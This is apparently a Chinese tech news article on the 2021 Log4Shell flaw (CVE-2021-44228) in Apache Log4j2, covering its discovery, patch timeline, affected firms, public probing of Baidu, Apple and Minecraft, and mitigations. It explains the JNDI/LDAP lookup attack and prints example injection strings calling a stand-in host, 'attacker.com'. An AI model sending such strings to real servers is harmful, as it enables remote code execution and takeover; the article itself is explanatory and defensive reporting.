2021年11月24日，阿里云安全團(tuán)隊(duì)依然像往常一樣進(jìn)行著漏洞的篩查工作。

讓人沒(méi)想到的是，團(tuán)隊(duì)成員之一的Chen Zhaojun一鏟子下去，就挖出了一個(gè)「過(guò)去十年來(lái)影響最大、最嚴(yán)重的漏洞」——Log4Shell。

借著這個(gè)漏洞，攻擊者只需要提交一個(gè)字符串就能訪問(wèn)對(duì)方的服務(wù)器，甚至還能在里面上傳運(yùn)行任何代碼！

結(jié)果就是，12月10號(hào)，本來(lái)已經(jīng)在準(zhǔn)備過(guò)周末的大廠程序員們，都起來(lái)通宵加班處理漏洞了。

這個(gè)漏洞波及了多少大廠呢？

由于Log4j2這個(gè)庫(kù)實(shí)在是太受歡迎了，所以包括蘋果、Tesla、亞馬遜、Cloudflare、ElasticSearch、Red Hat、Twitter、Steam、百度、網(wǎng)易、騰訊等大廠都會(huì)受到影響。

可能，還有數(shù)百家甚至數(shù)千家其他組織也會(huì)受到影響。

一些信息安全研究人員預(yù)計(jì)，未來(lái)幾天互聯(lián)網(wǎng)上對(duì)服務(wù)器的攻擊會(huì)大幅增加。

驚魂一刻

11月24日，開源項(xiàng)目Apache Log4j2的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞被提交。

12月7日上午，Apache發(fā)布了2.15.0-rc1版本更新。

12月9日晚，漏洞的利用細(xì)節(jié)被公開，影響范圍幾乎橫跨整個(gè)版本（從2.0到2.14.1-rc1）。

當(dāng)大家紛紛升級(jí)到2.15.0-rc1之后發(fā)現(xiàn)，該補(bǔ)丁依然可以被繞過(guò)。

12月10日凌晨2點(diǎn)半左右，Apache Log4j2緊急更新了2.15.0-rc2版本。

此時(shí)，各個(gè)大廠也幾乎都在熬夜搶修。

據(jù)火絨不完全統(tǒng)計(jì)，僅在Github上，就有60644個(gè)開源項(xiàng)目發(fā)布的321094軟件包存在風(fēng)險(xiǎn)，這一漏洞可以說(shuō)是影響了互聯(lián)網(wǎng)上70%以上企業(yè)系統(tǒng)的正常運(yùn)轉(zhuǎn)。

Java開發(fā)框架中，受到Log4j2的影響Top10（來(lái)源：火絨安全）

這一漏洞名為CVE-2021-44228，也叫Log4Shell或LogJam，是一個(gè)遠(yuǎn)程代碼執(zhí)行（RCE）類漏洞，存在于一個(gè)「數(shù)百萬(wàn)」應(yīng)用程序都在使用的開源Java日志庫(kù)Log4j2中。

由于Java應(yīng)用程序通常會(huì)記錄各種各樣的事件，例如用戶發(fā)送和接收的消息，或者系統(tǒng)錯(cuò)誤的詳細(xì)信息，因此該漏洞可以通過(guò)多種方式觸發(fā)。

而這一漏洞最危險(xiǎn)的地方是它太容易被攻擊者利用了，即使是毫無(wú)經(jīng)驗(yàn)的普通人也可以利用這個(gè)漏洞成功執(zhí)行攻擊。

攻擊者只需發(fā)送一則特殊的消息到服務(wù)器（包含類似${jndi:ldap://server.com/a}的字符串），就可以執(zhí)行任意的代碼，并有可能完全控制該系統(tǒng)。

據(jù)阿里的@程序員子悠介紹，服務(wù)器會(huì)通過(guò)Log4j2記錄攻擊者發(fā)送的請(qǐng)求匯中包含的基于JNDI和LDAP的惡意負(fù)載${
jndi:ldap://http://attacker.com/}，其中，http://attacker.com是攻擊者控制的地址。

當(dāng)服務(wù)器通過(guò)JNDI向http://server.com請(qǐng)求，觸發(fā)惡意負(fù)載之后，http://attacker.com就可以在響應(yīng)中添加任何可執(zhí)行腳本，注入到服務(wù)器進(jìn)程中。

于是，上個(gè)周末，大大小小公司的安全團(tuán)隊(duì)都在爭(zhēng)先恐后地修補(bǔ)Log4Shell漏洞，晚一秒，就有可能讓黑客危及互聯(lián)網(wǎng)上數(shù)百萬(wàn)臺(tái)設(shè)備。

而黑客們也沒(méi)閑著，安全服務(wù)商imperva當(dāng)天就監(jiān)控到了140多萬(wàn)次針對(duì)CVE-2021-44228的攻擊。

新西蘭計(jì)算機(jī)應(yīng)急響應(yīng)小組(CERT)、德國(guó)電信(Deutsche Telekom)和Greynoise的網(wǎng)絡(luò)監(jiān)控服務(wù)都發(fā)出了警告：「攻擊者已經(jīng)在積極利用這個(gè)漏洞」。

根據(jù)Greynoise的說(shuō)法，大約100個(gè)不同的主機(jī)正在大規(guī)模地尋找利用Log4j2漏洞的方法。

很快，多家信息安全新聞機(jī)構(gòu)都報(bào)道了這個(gè)在Apache Log4j2庫(kù)中發(fā)現(xiàn)的，CVSS嚴(yán)重程度為10級(jí)的關(guān)鍵漏洞CVE-2021-44228。

阿里云安全團(tuán)隊(duì)在12月10日發(fā)布公告。

https://help.aliyun.com/noticelist/articleid/1060971232.html

國(guó)家互聯(lián)網(wǎng)應(yīng)急中心12月10日發(fā)布公告。

https://www.cert.org.cn/publish/main/9/2021/20211210110550958546708/20211210110550958546708_.html

美國(guó)國(guó)家計(jì)算機(jī)通用漏洞數(shù)據(jù)庫(kù)12月10日發(fā)布公告。

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Apache基金會(huì)也迅速回應(yīng)，建議所有開發(fā)人員能升級(jí)就升級(jí)，將手頭上使用到的Log4j2庫(kù)更新到2.15.0版本，如果因?yàn)橐恍┰蛏涣思?jí)，就使用Apache Log4j2安全漏洞頁(yè)面中描述的方法進(jìn)行撲救。

12月12號(hào)，有網(wǎng)友反映銀行的程序都不能用了，推測(cè)可能正在加班加點(diǎn)排查，看來(lái)波及范圍確實(shí)挺大的。

這下程序員們要哭了，紛紛吐槽：

「連夜搶修」

「忙活大半天」

復(fù)現(xiàn)漏洞

國(guó)民級(jí)搜索引擎百度首先遭到了廣大網(wǎng)友的暴力測(cè)試！

漏洞剛曝光時(shí)，如果在百度搜索框中輸入命令，然后在dnslog中就可以發(fā)現(xiàn)訪問(wèn)信息，隨后開發(fā)人員也是緊急修復(fù)了這個(gè)漏洞。

接著，網(wǎng)友又攻破了一向以安全性著稱的蘋果。

Minecraft也同樣慘遭毒手。

由于Minecraft在軟件中也采用了Log4j2，而且使用范圍很廣，這就導(dǎo)致了除Mohist 1.18外，Minecraft全版本所有系列的服務(wù)端全部處于高風(fēng)險(xiǎn)狀態(tài)。

這樣一來(lái)，在聊天欄輸入命令就可以在游戲中作弊。

對(duì)于Minecraft服主來(lái)說(shuō)，當(dāng)前最該做的就是立即關(guān)閉服務(wù)器，并進(jìn)行升級(jí)和緊急修復(fù)，普通玩家則需要等待，直到服務(wù)器確認(rèn)修復(fù)完成。

解決方案

根據(jù)360的建議，用戶可以進(jìn)行如下操作。

常規(guī)方案

使用了Apache Log4j2的用戶，請(qǐng)將程序更新至官方最新安全版本（2.15.0-rc2）。下載地址:

https://github.com/apache/logging-Log4j22/releases/tag/Log4j2-2.15.0-rc2

臨時(shí)應(yīng)急方案

修改Log4j2配置：

Log4j22.formatMsgNoLookups=True

設(shè)置JVM啟動(dòng)參數(shù)：

-DLog4j22.formatMsgNoLookups=true

設(shè)置環(huán)境變量：

FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS值為true

可以提高安全性的周邊設(shè)置

以下設(shè)置或操作可能會(huì)對(duì)防護(hù)此次安全事件起到作用，但無(wú)法確保安全。建議結(jié)合實(shí)際應(yīng)用場(chǎng)景進(jìn)行配置：

1. 使用盡可能更高版本的JDK
2. 使用rasp阻斷l(xiāng)ookup的調(diào)用
3. 使用waf對(duì)流量中的${jndi進(jìn)行攔截
4. 禁止所有不必要的外連數(shù)據(jù)

開源項(xiàng)目的風(fēng)險(xiǎn)

Log4j2的安全事故一出，不禁讓廣大用戶重新開始懷疑：開源軟件是否真的安全？

一方面大家覺(jué)得開源軟件嘛，代碼都拿到手了，在遵照開源協(xié)議的情況下，基本就是白嫖。

另一方面，覺(jué)得有這么多人都在盯著這份代碼，肯定不會(huì)出bug，不然一定會(huì)有人提issue修復(fù)的。在不花錢的情況下，又指望它有企業(yè)級(jí)的維護(hù)支持與安全性保障。

殊不知，大部分開源軟件都是作者利用業(yè)余時(shí)間開發(fā)的，為開源社區(qū)貢獻(xiàn)代碼的驅(qū)動(dòng)力全部來(lái)自于star和「用愛發(fā)電」。

也正是因?yàn)槊赓M(fèi)，一些開源軟件的受眾規(guī)模特別大，從小公司到千億市值的企業(yè)都在使用，如果一旦出了漏洞，那后果將不堪設(shè)想。

所以，開源有風(fēng)險(xiǎn)，使用需謹(jǐn)慎！